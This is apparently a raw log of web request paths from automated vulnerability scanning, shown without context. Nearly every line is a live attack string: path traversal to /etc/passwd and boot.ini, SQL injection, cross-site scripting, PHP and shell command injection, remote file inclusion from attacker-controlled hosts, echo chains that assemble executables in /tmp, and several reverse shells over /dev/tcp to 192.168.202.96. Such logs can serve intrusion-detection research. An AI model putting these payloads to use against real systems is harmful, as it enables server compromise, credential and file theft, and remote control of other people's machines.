/examples/jsp/colors/activatemember?activatecode=&member=">
/mv8wxfy9.cgi?
/"rss+security"/
/dir_thatware/config.php?root_path=http://192.168.202.96:8080/4dckqcc0acprbz?'
/8t9v8k7x.idc?
/javascript/viewcvs.exe
/static//\..\..\..\..\..\..\..\..\windows/win.ini
/subscriptions.jhtml
/scripts/listrec.pl?app=qmh-news&template=;ls /etc|
/cgi-bin/js/scripts.php?load=/boot.ini\x00
/javascript/true.exe
/rbec2ohx.x?
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/rymojltfjq0+>+/dev/null+&'); function v
/cgi-bin/test-cgi.exe?
/6wb70v0b.pl?
/subscriptions.cgi
/gepi/gestion/savebackup.php?filename=http://cirt.net/rfiinc.txt?&cmd=cat/etc/passwd
/mv8wxfy9.exe?
/help.php?q="\x0adel\x09q73265631\x09#
/scripts/wsnsa.dll/wservice=wsbroker1/webutil/ping.p
/s7qus4g3.jspa?
/i7prbs22.mscgi?
/nyjgaorz.jspa?
/conscript_gifts/
/cacti/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1
/cgi-bin/index.php?id='union/**/select/**/0,0,1673700990,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/top.php?stuff='\x0ddel q83658658 #
/scripts/wxrdqnkjuwmu.html
/cgi-bin/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl
/h21y8w52.x?
/examples/jsp/cal/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&"
/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=tshujzjrl3ejhp0_3
/main.php?logout=&ver >q46544641&rem
/azcrfs8d.nsf?
/
/javascript/22.exe
/en-us/ddoworrl.cfc?
/0rufe52p.fts?
/examples/jsp/jsp2/el/showproduct.php?product=1'
/h21y8w52.mscgi?
/examples/jsp/jsp2/jspx/forumdisplay.php?fid=21">
/javascript/webdb.exe
/examples/jsp/sessions/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini
/examples/servlets/servlet/phptonuke.php?filnavn=/etc/passwd
/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331919003,1,1,1,1,1,1,1--&blogid=1
/
.dll
/htbin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html
/includes/converter.inc.php?include_path=/etc/passwd\x00
/popup.php?poll_ident=
/recordings/include/sql.php?include_path=/etc/passwd\x00
/a0imiuf1.idc?
/scripts/ui/login?user=nessus-1331909161
/top.php?stuff="ver\x09>q12423295&rem\x09
/manager/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00
/cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../vtigerservice.php\x00
/top.php?stuff='\x0duname\x09>q88128927\x09#
/scriptome/
/examples/jsp/num/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00
/gy23xnjq.do?
/en-us/ddoworrl.htm?
/igtf0zon.exe?
/vac1l5vm.x?
/atlantisrebornagain_transcript/
/6qbynt4f.dll?
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/4dckqcc0acprbz??
/examples/jsp/jsp2/el/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd
/cgi-bin/index.php?op=default&date=200607' union select 1,199642765,1,1,1,1,1,1,1,1--&blogid=1
/m4kkjf8l.exe?
/phpmyadmin/bandwidth/index.cgi?action=showmonth&year=&month=
/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/vir0v3xfc?\x00
/scripts/printenv.tmp
/top.php?stuff='\x0asleep 7 #
/scripts/?p=subscribe
/index.php?c=access&a=login&ref_c=nessus">&ref_a=projectpier_login_page_xss.nasl">
/scripts/n4p4f4gtbhia.cfm
/examples/jsp/num/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00
/de3v2dd9.jsp?
/examples/jsp/checkbox/calendar_admin.pl?config=|cat /etc/passwd|
/manager/help/index.php?help_file=../../../../../../../../../../../etc/passwd
/manager/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/odzk29aa.asp?
/viewcat.php?catid=21abc'&s_itemnum=&s_user_id=&s_title=&s_description=&s_asking_min=&s_asking_max=&s_quantity=&s_city_town=&s_state_province=
/zmvq66jy.asp?
/nyvbv05h.nsf?
/javascript/showpost.exe
/rpxyx07v.idc?
/main.php?stuff="&del\x0cq64367569&rem\x0c
/examples/jsp/jsp2/jspx/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_jugo3scd]));die;/*
/member/usercp_menu.php?script_folder=http://192.168.202.118:8080/tzhfyzkbomspvm?
/cgi-bin?username="alert('base_local_rules_xss.nasl-1331904405')
/examples/jsp/num?username="q19468613&rem
/0w155a7c.pl?
/recordings/help.php?section='qualiteam_xcart_sql_xss.nasl
/examples/jsp/jsp2/el/starnet/addons/slideshow_full.php?album_name='1654493777
/help.php?q="del\x0cq88163734&rem\x0c
/rpxyx07v.htm?
/javascript/tcl.exe
/script/ident/disconnect.php?path_inc=@rfiurl
/javascript/codec.exe
/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904240','5'--
/cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/cgi-bin/texis.exe/nessus
/save.php?file_save=/etc/passwd
/scripts/1331923142-ror_session_fixation.nasl
/forum1_professionnel.asp?n=1771&nn=/....../boot.ini&page=1
/scripts/wx4z4gedhl0l.cfm
/scripts/check-lom.php?etcdir=@rfiurl
/main.php?logout=';sleep 11 #
/javascript/htpasswd.cs
/rpxyx07v.kspx?
/topsitesdirectory/help.php?sid=<script>alert(document.cookie)</script>
/javascript/outreach.exe
/examples/jsp/colors/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
/java_script/
/top.php?stuff="del q61611865&rem
/jdx255ea.nsf?
/examples/jsp/sessions/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 --
/main.php?stuff="uname\x09>q84368944\x09#
/javascript/oaerrordetailpage.exe
/examples/jsp/sessions/shoutbox.php?conf=../../../../../../../../etc/passwd
/cacti/mapserv.exe?map=mapserver_detect.nasl.map
/top.php?stuff="ping;-w;9000;-n;1;1.2.3.4&rem;
//
/rpc.php?q=\">
/main.php?logout="ping,-w,7000,-n,1,4.3.2.1|rem,
/examples/jsp/jsp2/jspx/index.php?entry='
/cgi-bin/index.php?id=hw828khs0f'
/eventum_xss/
/examples/jsp/sessions/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00
/en-us/h5sc3gxy.html?
/www/delivery/ac.php?bannerid=-1332008323+or+1=1+--+';passthru(base64_decode($_server[http_nessus_tbftd0nk]));die;/*
/mxhelp/cgi-bin/namazucgi?lang=/../../../../../../../../../../../../../boot.ini
/scripts/cfgwiz.exe
/cgi-bin/shared/help.php?page=../../../../../../../../../../etc/passwd\x00
/cgi-bin/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00
/examples/jsp/sessions/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd
/examples/servlets/servlet/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl
/scripts/yfmo7jpwvpv1.php
/help.php?q=ver\xa0>q87371136&rem\xa0
/cgi-win/r.cgi?file=../../../../../../../../../../etc/passwd
/phpmyadmin/../phpmyadmin.tar.gz
/examples/jsp/colors/forum_2.php?msg=10&return=
/dda2qr7j.htm?
/main/inc/lib/fckeditor/editor/plugins/imagemanager/editor.php?img="><"
/?
/examples/jsp/cal/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x
/scripts/rih28haesl0j.cgi
/help.php?q=&del;q11223182&rem;
/top.php?stuff=ver&rem;
/en-us/33y9gcqq.cgi?
/examples/jsp/jsp2/el/include/error/autherror.cfm?errorcode=1&ftvar_linkp=">
/cgi-bin/index.php?src=1&_common=1&time=1331923205&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/help.php?q="&del q92537281&rem
/1qwv2p5p.exe?
/examples/jsp/cal/index.php?id='union/**/select/**/0,0,1317538123,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/main.php?stuff="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/cgi.cgi/gw5/gwweb.exe?htmlver=aaa&get-context
/top.php?stuff='&rm\x09q76725442\x09#
/javascript/text-base.exe
/main.php?logout='del q29138864 #
/examples/jsp/error/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00
/search.cgi?..\..\..\..\..\..\windows\win.ini
/top.php?stuff="|ping -w 11000 -n 1 1.2.3.4|rem
/inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/ghl9il?
/actscript2/
/javascript/tree.exe
/main.php?stuff="ping\x0b-w\x0b8000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b
/scripts/man2html?section=-p id&topic=w
/javascript/bill.exe
/top.php?stuff='sleep\x0911\x09#
/examples/jsp/cal/admin/admin.php?sid=0'
/subscriptinfo/
/nph-script/
/
/tuwjta1w.cfm?
/examples/jsp/colors/edit.jsp?page=user&editor=../../../install
/cacti/check_user_id.php?user_id=
/cgi-bin/fpsrvadm.exe
/scripts/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00
/cgi-bin/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id
/vmi8bb12.asp?
/javascript/e2fs.exe
/x2gyorli.asp?
/administrator/gallery/gallery.php?directory=\"
/main.php?logout="|ping\xa0-w\xa09000\xa0-n\xa01\xa01.2.3.4|rem\xa0
/interface/login/login_frame.php?site='injected_param
/i2n4v4rl.jsp?
/examples/jsp/sessions/index.php?gadget=glossary&action=viewterm&term=
/scripts/polls.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt??
/help.php?q="|sleep 10 #
/editor's-blog/
/\xd0\x9a\xd0\xbe\xd0\xbc\xd0\xbf'\xd1\x8e\xd1\x82\xd0\xb5\xd1\x80\xd0\xb8/
/javascript/.htaccess/skipfish://invalid/;?
/h4bi26jd.mscgi?
/scs86g1p.aspx?
/byrg33fw.kspx?
/
/qhvu0pdg.html?
/top.php?stuff="&ver >q85227619&rem
/phpmyadmin/mapserv.exe?map=mapserver_detect.nasl.map
/cgi-bin/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00
/edv3mapy.cfm?
/gallery/search.php?searchstring=
/8x6w469u.aspx?
/phpmyadmin/whois.cgi?action=load&whois=;id
/top.php?stuff="&rm\x09q42671474&rem\x09
/main.php?stuff="&rm q89179194&rem
/examples/jsp/jsp2/el/search.cgi?..\..\..\..\..\..\windows\win.ini
/psynch/nph-psf.exe?css=http://192.168.202.118:8080/2aibfaczmac8?
/
/examples/servlets/servlet/help.php?section='qualiteam_xcart_sql_xss.nasl
/iajtej82.nsf?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+01+00+00+0e+1f+ba+0e+00+b4+09+cd+21+b8+01++>>esbq
/scripts/2sfdqydfaknx.php3
/9ko6m4c8.asp?
/phpmyadmin/item.fts?href=">;
/cacti/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd
/tuwjta1w.cfc?
/uwiyxrvhad.exe
/d44uk9h2.kspx?
/recordings/fxm.exe
/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.copy
/cgi-bin/forum_2.php?msg=10&return=
/scripts/misc.php?action=login
/ywaxntrx.php?
/ny1b3qq4.fts?
////////../../../../../../etc/passwd
/d7ktpmcq.x?
/examples/servlets/servlet/sources/functions.php?root_path=/etc/passwd\x00
/o1zj4u9v.cgi?
/examples/jsp/error/kernel/loadkernel.php?installpath=/etc/passwd\x00
/seventeen's - boots camp/
/javascript/log4j.exe
/phprocketaddin/?page=../../../../../../../../../../boot.ini
/twiki/bin/view/main/twikiusers?rev=865 `0<&44-;exec 44<>/dev/tcp/192.168.202.96/7131;sh <&44 >&44 2>&44`#
/manager/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='
/examples/jsp/sessions/webadmin.php?show=/etc/passwd
/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,526188729179,4,5,6,7,8,9,10,11--
/javascript/document.save
/main.php?logout="&rm q52615858&rem
/fnwhrxyd.html?
/nmw0do67.dll?
/examples/jsp/jsp2/jspx/ovlaunch.exe
/javascript/servlet.exe
/main.php?logout='\x0asleep 11 #
/phpmyadmin/documentation.html?phpmyadmin=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
/merengue
/manager/showcat.php?cat=1'
/d5a5renl.htm?
/top.php?stuff="\x0drm q93764844 #
/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332008331
/news-script/
/javascript/operations.exe
/top.php?stuff="&ping\x0c-w\x0c7000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c
/fc9t54l7.pl?
/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 --
/main.php?logout="&rm\x09q14643294&rem\x09
/uvazfs7p.cgi?
ftp://ftp/*
/x7pclv4s.asp?
/fmnveedu.htm?
/javascript/_res.exe
/xlj7h65o.fts?
/help.php?q='\x0ddel\x09q57419215\x09#
/script/_conf/core/common-tpl-vars.php?confdir=http://192.168.202.118:8080/tzhfyzkbomspvm??
/javascript/this.exe
/templates/form_header.php?noticemsg=
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/bin/echo+-en+"\0174\0044\0000\0377\0347"+>>+/tmp/ftxarcvjda0;')."]=1
/script/template/index.php?main_page_directory=http://192.168.202.118:8080/moclyxlwqyfjnp?
/phpmyadmin//.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\windows/win.ini
/cgi-bin/cgitest.exe
/examples/servlets/servlet/sendtemp.pl?templ=../../../../../etc/passwd
..\\..\\..\..\\..\..\\..\..\\\boot.ini
/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919011,1,921952561--
/p043snfr.dll?
/client/vmware-viclient.exe
/siteserver/knowledge/default.asp?ctr=\">
/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 --
/script/tick/test.php?path_to_code=http://192.168.202.118:8080/zz5thkvtmlgl?
/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
/recordings/awstatstotals.php?sort="].phpinfo().exit().$a["
/help.php?q="del q11698793 #
/r3le3om5.exe?
/<4429ea00/
/9ko6m4c8.do?
/egaet53a.do?
/javascript/array.exe
/help.php?q="&del\xa0q16679515&rem\xa0
/cacti/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00
/examples/jsp/error/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini
/phpmyadmin/webadmin.php?show=/etc/passwd
/3hlysl2x.html?
/en-us/account/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00
/help.php?q="&del q86798622&rem
/examples/jsp/error/index.php?cat_select=
/apavxugx.aspx?
/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
/newsarchive.php?path_to_script=http://192.168.202.118:8080/zz5thkvtmlgl??&cmd=ls
/manager/zpanel.php?page=/etc/passwd\x00
/examples/jsp/jsp2/jspx/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/javascript/.passwd.ep
/en-us/ddoworrl.dll?
/sgdynamo.exe?htname=sgdynamo.exe
/javascript/u.exe
/main.php?stuff="|ping -w 8000 -n 1 1.2.3.4|rem
/scripts/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00
/cgi-shl/win-c-sample.exe
/javascript/faculty.exe
/d7ktpmcq.aspx?
/scripts/index.php?gadget=glossary&action=viewterm&term=
/javascript/.htaccess.sfish/.htaccess.aspx-->">'>'"
/examples/jsp/jsp2/el/mlog.html?screen=/etc/passwd
/main.php?stuff=&ver\x0c>q42577666&rem\x0c
/help.php?q='\x0duname\x09>q85664498\x09#
/examples/jsp/cal/direct.php?rf=/etc/passwd\x00
/javascript/counters.exe
/search/submit.php?config["sipssys"]=http://192.168.202.118:8080/zz5thkvtmlgl?
/en-us/esmozg5d.pl?
/main.php?stuff="|ping;-w;11000;-n;1;4.3.2.1|rem;
/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file¤tfolder=/fckeditor_currentfolder_file_upload-1332010431.php.
/modif_infos.asp?n=/../../../../../../../../../etc/passwd
/link-description/
/pxagj7n7.php?
/examples/jsp/checkbox/myevent.php?myevent_path=/etc/passwd\x00
/examples/jsp/jsp2/el/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00
/manager/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00
/h5i6crm3.cgi?
/en-us/33y9gcqq.mscgi?
/examples/jsp/error/showcat.php?cat=1'
/u95h6ymu.html?
/scripts/login.aspx
/..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd
/jujgxwav.do?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+04+00+00+00+00+00+00+00+00+40+00+00+00+04+00+00+00+00+00+00+02+00++>>esbq
/en-us/account/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl
/that's that/
/phpmyadmin/javascript.php?abs_path=/etc/passwd\x00
/examples/jsp/colors/webdist.cgi?distloc=;id
/cgi/htimage.exe/path/filename?2,2
/main.php?stuff="&rm\x09q71999354\x09#
/rbec2ohx.mscgi?
/forums/index.php?board=;action=login2&user=username&cookielength=120&passwrd=password
/edzaia0i.php3?
/javascript/high.exe
/index.php?op=default&date=200607' union select 1,1990910236,1,1,1,1,1,1,1,1--&blogid=1
/test.php?evalme=eval($_server[http_x_efjcfccjtkphmyk]);
/h5i6crm3.idc?
/examples/jsp/num/phpnews/sendtofriend.php?mid='1'
/cacti/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/javascript/cnf.exe
/cgi.cgi/query?mss=../config
/examples/jsp/jsp2/jspx/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 --
/en-us/odzk29aa.html?
/e9rx3ya4.cfc?
/cgi-sys/gwweb.exe?help=bad-request
/en-us/hipkz026.html?
/scripts/search/results.stm?indexname=>">&style=fancy&spage=60&query=folder name
/emailsubscriptionservice/
/?
/de3v2dd9.kspx?
/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5
/examples/jsp/jsp2/jspx/admin/admin.php?sid='
/x7pclv4s.php3?
/cgi-win/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
/rtpdumpscript/
/examples/servlets/servletmultihtml.pl?multi=/etc/passwd\x00html
/javascript/1996.exe
/components/com_mospray/scripts/admin.php?basedir=http://cirt.net/rfiinc.txt??&cmd=id
/tuwjta1w.php?
/search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script>
/examples/jsp/sessions/secure.php?cfgprogdir=/etc/passwd\x00
/top.php?stuff=;rm\x09q62254247\x09#
/javascript/tapestry.exe
/phpmyadmin/welcome.php?custom_welcome_page=/etc/passwd\x00
/jscript.php?my_ms[root]=http://192.168.202.96:8080/4dckqcc0acprbz??
/order/login.php?svr_rootscript=http://192.168.202.118:8080/zz5thkvtmlgl?
/t7tm4m0b.exe?
/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini
/82q7ywa8.do?
/kur'an-r0/
/1r8cfrlf.aspx?
/nyvbv05h.nsf?
/examples/jsp/sessions/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1
/examples/jsp/colors/sawmill6cl.exe?ho+{complete_version}
/file_description/
/snippetmaster/includes/vars.inc.php?_session[script_path]=http://192.168.202.96:8080/4dckqcc0acprbz??
/5o9zq43e.cgi?
/a0imiuf1.cfc?
/en-us/n9xlumt5.nsf?
/examples/jsp/error/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html
/g8nu2yy7.do?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+c0+31+db+89+45+f0+8b+46+3c+8b+44+06+78+01+f0+83+c0+18+8b+10+89+55+f4+89+f2++>>ctdn
/main.php?logout=&ver\x0c>q38243564&rem\x0c
/raanw4ia.cfm?
/cgi-bin/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd
/d5a5renl.htm?
/cgi-local/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/2000transcripts/
/top.php?stuff="ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1|rem\xa0
/ap58k3ci.dll?
/help.php?q=&rm;q75765892&rem;
/gvx7m5ti.jspa?
/main.php?logout=ver&rem;
/scripts/xuicksry9grj.php
/examples/jsp/checkbox/faq.php?action=&type=view&s=&id=-1' union select 0,337036838,0,0,0,0,0--
/3hlysl2x.htm?
/javascript/engine.exe
/examples/jsp/error/language.php?data_dir=/etc/passwd\x00
/h4bi26jd.cfm?
/fpnpp5zg.jsp?
/scripts/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc
/examples/servlets/servlet/admin/top.php?admindir=/etc/passwd\x00
/search.php?config["sipssys"]=http://192.168.202.96:8080/4dckqcc0acprbz?
/scriptingnewsinxml/
/examples/jsp/error/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 --
/raanw4ia.fts?
/speedscript/
/phpmyadmin/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd
/zmvq66jy.cfm?
/vmi8bb12.nsf?
/scripts/formmail.pl
/modules.php?set_albumname=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
/en-us/7o5qp766.cgi?
/help.php?q='\x0dsleep\x097\x09#
/examples/jsp/num/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd
/fcgi-bin/view_item?html_file=../../../../../../../../../../etc/passwd\x00
/main.php?stuff="ping,-w,8000,-n,1,4.3.2.1|rem,
/top.php?stuff="&rm q85387982 #
/xlj7h65o.do?
/phpmyadmin/index.php?op=default&date=200607' union select 1,760917547,1,1,1,1,1,1,1,1--&blogid=1
/manager/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00
/transcript050506/
/i7prbs22.x?
/oie504mr.aspx?
/swisscom-xss/
/
/examples/jsp/jsp2/el/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 --
/main.php?logout="\x0auname\x09#
/nuh3zirz.fts?
/javascript/oa_html.exe
/mv8wxfy9.asp?
/manual/servlets/scripts/servlet1/servform.htm
/javascript/advanced.exe
/scripts/rvckwz6smkqf.cgi
/javascript/pro.exe
/examples/jsp/checkbox/wa.exe?debug-show-version
/en-us/7o5qp766.jspa?
/main.php?logout=&ver;>q42123677&rem;
/help.php?q="\x0arm\x09q45619595\x09#
/scripts/namazu.cgi
/scgi-bin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd
/examples/jsp/jsp2/jspx/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00
/awstatstotals.php?sort="].passthru('id').exit().$a["
/top.php?stuff='\x0asleep\x0910\x09#
/phpmyadmin/phpmyadmin.css.php?collation_connection=utf8_general_ci&convcharset=utf-8&js_frame=right&lang=en-utf-8&nocache=3830415403&token='"
/0qhcnefz.x?
/examples/jsp/error/core/api.php?t_path_core=/etc/passwd\x00
/main.php?logout="del\x0bq12574322&rem\x0b
/examples/jsp/colors/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd
/techweb's rss feed/
/scripts/index.php?id='union/**/select/**/0,0,1511087781,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/main.php?logout='\x0adel q63177134 #
/twiki/bin/view/main/twikiusers?rev=87518 `0<&152-;exec 152<>/dev/tcp/192.168.202.96/22811;sh <&152 >&152 2>&152`#
/scripts/nslookup.cgi?query=localhost;id&type=any&ns=
/insertorder.cfm?cfid=&cftoken=1'tst
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/news/include/createdb.php?langfile;=@rfiurl?langfile;=@rfiurl?
/scripts/news.scr.php?globals[pth][classes]=http://192.168.202.118:8080/moclyxlwqyfjnp??
/wps/wcm/webinterface/login/login.jsp?">
//
/en-us/7o5qp766.x?
/help.php?q="rm\x09q83132484&rem\x09
/scripts/base_local_rules.php?dir=
/7dbjwpw6.kspx?
/javascript/htpasswd.jpg
/en-us/account/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331905213,113095511 --
/script/fckeditor/license.txt
/0w155a7c.cgi?
/top.php?stuff="ping,-w,11000,-n,1,1.2.3.4|rem,
/let's-dance/
/scripts/event_view.php?eid=34 union select 1215611548
/phpmyadmin/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/iv5vkgam.idc?
/top.php?stuff=";rm\x09q95359991\x09#
/3j8echh0.do?
/script-fu/
/pbserver/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\+/og
/fcgi-bin/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf
/ygkjkngd.html?
/ewc3rz1l.dll?
/
/help.php?q="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b
/examples/jsp/checkbox/directory.php?dir=;cat /etc/passwd
/s7qus4g3.kspx?
/examples/jsp/checkbox/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
/qb2xy9aw.jspa?
/nyjgaorz.aspx?
/examples/jsp/error/index.php?user_langue=../../../../../../../../../../etc/passwd
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/&frm_user=q37639343&scr_height=&scr_width=
/awstats/awstats.pl?migrate=|echo;/./tmp/yzicxmyifv0 > /dev/null &;echo|awstats558782.txt
/bn857frh.do?
/athenareg.php?pass= ;id
/ao22ww7y.aspx?
/ygkjkngd.do?
/top.php?stuff='&del\x09q47253924\x09#
/examples/jsp/colors/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo
/examples/jsp/colors/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/scripts/print.php?what=article&id='
/help.php?q="|ping,-w,10000,-n,1,1.2.3.4|rem,
/scripts/zdbyw3dn3gh2.pl
/javascript/internet.exe
/main.php?logout='rm\x09q59958199\x09#
/en-us/account/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini
/examples/jsp/error/shopexd.asp?catalogid='42
/script_path/installation/index.php?mosconfig_absolute_path=http://cirt.net/rfiinc.txt??
/cgi-local/gw5/gwweb.exe?help=bad-request
/jnt3f86c.cfm?
/main.php?logout=;rm q17429254 #
/examples/jsp/error/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00
/j4oqyvga.aspx?
/main.php?stuff="ping\xa0-w\xa07000\xa0-n\xa01\xa04.3.2.1|rem\xa0
/5qnlm5z2.exe?
/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1332008335,4,5
/o1zj4u9v.idc?
/main.php?logout="del\x09q51755129&rem\x09
/main.php?stuff="&ver\x0b>q52976574&rem\x0b
/examples/jsp/cal/starnet/addons/slideshow_full.php?album_name='336230542
/_vti_bin/..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332010411
/esmozg5d.pl?
/code/inc_header.php?gtopnombre=">
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/fppatbfqdp"
/0u75ldxq.dll?
/javascript/htpasswd.conf
/examples/servlets/servlet/cgiwrap/cgiwrap_error_page_handling_xss.nasl
/phpmyadmin/mylog.html?screen=/etc/passwd
/cgi-bin/commerce.cgi?page=../../../../../etc/passwd\x00index.html
/scripts/shop.plx/page=nessus838143127
/zmvq66jy.jsp?
/h5i6crm3.asp?
http://xxxxxxxxxxx.:80/.thtml
/j734qobz.php3?
/cacti/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd
/subscriptions.js
/quagynka.x?
/ollydbg_ollyscripts/
/javascript/pm.exe
/mailpasswd/
/tegenscript/
/mail.php?id='/**/union/**/select/**/1,2,1332010419,4--&blog=1
/j4rdyhw8.do?
/eg2u8pbv.idc?
/imprimer.asp?no=/etc/passwd|44|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'.
/7u1pb2xi.html?
/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/4dckqcc0acprbz?
/en-us/dda2qr7j.do?
/bn857frh.exe?
/wps/wcm/webinterface/login/login.jsp?">
/awstats/awstats.pl?migrate=|echo;/./tmp/xmefwyizyj0 > /dev/null &;echo|awstats852068.txt
